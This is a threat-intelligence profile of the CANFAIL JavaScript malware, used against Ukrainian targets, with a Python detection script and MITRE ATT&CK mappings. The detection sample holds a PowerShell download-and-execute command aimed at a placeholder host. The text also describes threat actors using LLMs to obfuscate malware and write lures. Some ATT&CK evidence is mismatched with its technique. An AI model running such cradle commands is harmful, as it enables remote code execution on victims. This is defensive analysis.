
CANFAIL

CANFAIL is an obfuscated JavaScript malware family used by a previously undocumented, suspected Russia-linked threat actor assessed as possibly affiliated with Russian intelligence services. It has been deployed primarily against Ukrainian organizations, including defense, military, government, and energy entities, with reported additional interest in aerospace and drone-linked manufacturers, nuclear and chemical research organizations, humanitarian groups, and other organizations tied to Ukraine; related activity also included targeting or reconnaissance involving Romanian and Moldovan entities.

Observed delivery is via phishing campaigns. The lures have included impersonation of Ukrainian energy organizations and a Romanian energy company, and emails contained Google Drive links to RAR archives carrying the malware. CANFAIL was often disguised with a double extension such as .pdf.js to appear as a document. On execution, the obfuscated JavaScript runs PowerShell to download and execute an additional stage, most commonly a memory-only PowerShell dropper, while displaying a fake error popup or message to the victim.
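As an added detection example (not code from the page or from Mallory), the following Python scans constructed Sysmon-style process-creation events for the chain described above: a Windows script host launched on a double-extension .js file, then spawning PowerShell with a download-and-execute command line. The script-host image names, regex heuristics and sample event values are assumptions, not indicators from the page.

```python
import re
from typing import Dict, List, Tuple

# Script hosts that execute a .js file when the user double-clicks it (assumed)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Double extension ending in .js, e.g. report.pdf.js (assumed heuristic)
DOUBLE_EXT_JS = re.compile(r"\.(pdf|doc|docx|xls|xlsx|txt)\.js\b", re.IGNORECASE)
# Common PowerShell download-and-execute cradle keywords (assumed heuristic)
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression"
    r"|\biex\b|net\.webclient)",
    re.IGNORECASE,
)

def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def flag_event(evt: Dict[str, str]) -> List[str]:
    """Return the reasons a single process-creation event looks like the CANFAIL chain."""
    reasons: List[str] = []
    image = _basename(evt.get("Image", ""))
    parent = _basename(evt.get("ParentImage", ""))
    cmd = evt.get("CommandLine", "")
    if image in SCRIPT_HOSTS and DOUBLE_EXT_JS.search(cmd):
        reasons.append("script host launched on double-extension .js file")
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        reasons.append("powershell spawned by script host")
        if DOWNLOAD_CRADLE.search(cmd):
            reasons.append("download-and-execute cradle in command line")
    return reasons

def scan(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (ProcessId, reasons) for every flagged event, in input order."""
    hits = []
    for evt in events:
        reasons = flag_event(evt)
        if reasons:
            hits.append((evt["ProcessId"], reasons))
    return hits

# Constructed sample events; paths and URL are placeholders, not real IOCs
SAMPLE_EVENTS = [
    {"ProcessId": "1001", "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\u\Downloads\report.pdf.js"'},
    {"ProcessId": "1002", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/stage2')\""},
    {"ProcessId": "1003", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell -c Get-Date"},
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS):
        print(pid, "->", "; ".join(reasons))
```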

Reporting also links CANFAIL with the malware family LONGSTREAM as part of Russia-nexus operations targeting Ukrainian organizations. In that context, CANFAIL is described as using LLM-generated decoy logic: large volumes of plausible-looking but functionally inert code woven into the malware to camouflage malicious functionality and hinder analysis and detection. Multiple cited sources describe CANFAIL and LONGSTREAM as examples of AI-enabled malware that uses benign-looking filler code for obfuscation.

Google Threat Intelligence Group identified CANFAIL in phishing operations and reported that the associated actor used LLMs not only in malware obfuscation but also to support reconnaissance, social-engineering lure creation, and basic technical guidance for post-compromise activity and C2 setup. Related reporting linked the actor to the PhantomCaptcha campaign documented in October 2025.


MITRE ATT&CK

Techniques & procedures

13 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

1 technique
T1587.001 Malware (evidence: 1)

threat actors are using large language models to write polymorphic loaders... Public reporting now names specific actor clusters in the wild... APT27... used Gemini to accelerate development of fleet management tooling... APT45... sending thousands of repetitive prompts that recursively analyze CVEs and validate proof-of-concept exploits

Initial Access

2 techniques
T1566 Phishing (evidence: 2)

"Recent phishing campaigns have involved the threat actor impersonating legitimate national and local Ukrainian energy organizations to obtain unauthorized access to organizational and personal email accounts."

T1566.002 Spearphishing Link (evidence: 2)

"The attack chains seemingly contain LLM-generated lures and embed Google Drive links pointing to a RAR archive containing CANFAIL malware."

Execution

3 techniques
T1059.001 PowerShell (evidence: 2)

"...designed to execute a PowerShell script that, in turn, downloads and executes a memory-only PowerShell dropper."

T1059.007 JavaScript (evidence: 2)

"CANFAIL is an obfuscated JavaScript malware that's designed to execute a PowerShell script..."

T1204 User Execution (evidence: 1)

“Phishing emails… contain… Google Drive links which host a RAR archive…”

Stealth

5 techniques
T1027 Obfuscated Files or Information (evidence: 6)

Meanwhile, Russia-associated threat actors were reportedly using AI-generated decoy code to conceal malware strains such as CANFAIL and LONGSTREAM.

T1027.001 Binary Padding (evidence: 1)

CANFAIL and LONGSTREAM... ask an LLM to generate large blocks of plausible-looking but functionally inert code, woven through the malicious logic as camouflage. One LONGSTREAM sample reportedly contained 32 separate instances of code querying the system’s daylight saving status

T1027.002 Software Packing (evidence: 2)

...two newly disclosed malware families that leverage AI for evasive techniques such as polymorphism...

T1036 Masquerading (evidence: 4)

CANFAIL and LONGSTREAM... ask an LLM to generate large blocks of plausible-looking but functionally inert code, woven through the malicious logic as camouflage... making the malware look like legitimate administrative software to a casual reviewer.

T1497 Virtualization/Sandbox Evasion (evidence: 2)

...the development of evasive malware. The report highlighted two previously discovered and two newly disclosed malware families that leverage AI for evasive techniques...

Discovery

1 technique
T1497 Virtualization/Sandbox Evasion (evidence: 2)

...the development of evasive malware. The report highlighted two previously discovered and two newly disclosed malware families that leverage AI for evasive techniques...

Command and Control

1 technique
T1105 Ingress Tool Transfer (evidence: 2)

“…runs a PowerShell script to download and execute a second-stage payload…”

Exfiltration

1 technique
T1567 Exfiltration Over Web Service (evidence: 1)

“Messages include Google Drive links hosting a RAR archive with CANFAIL malware…”
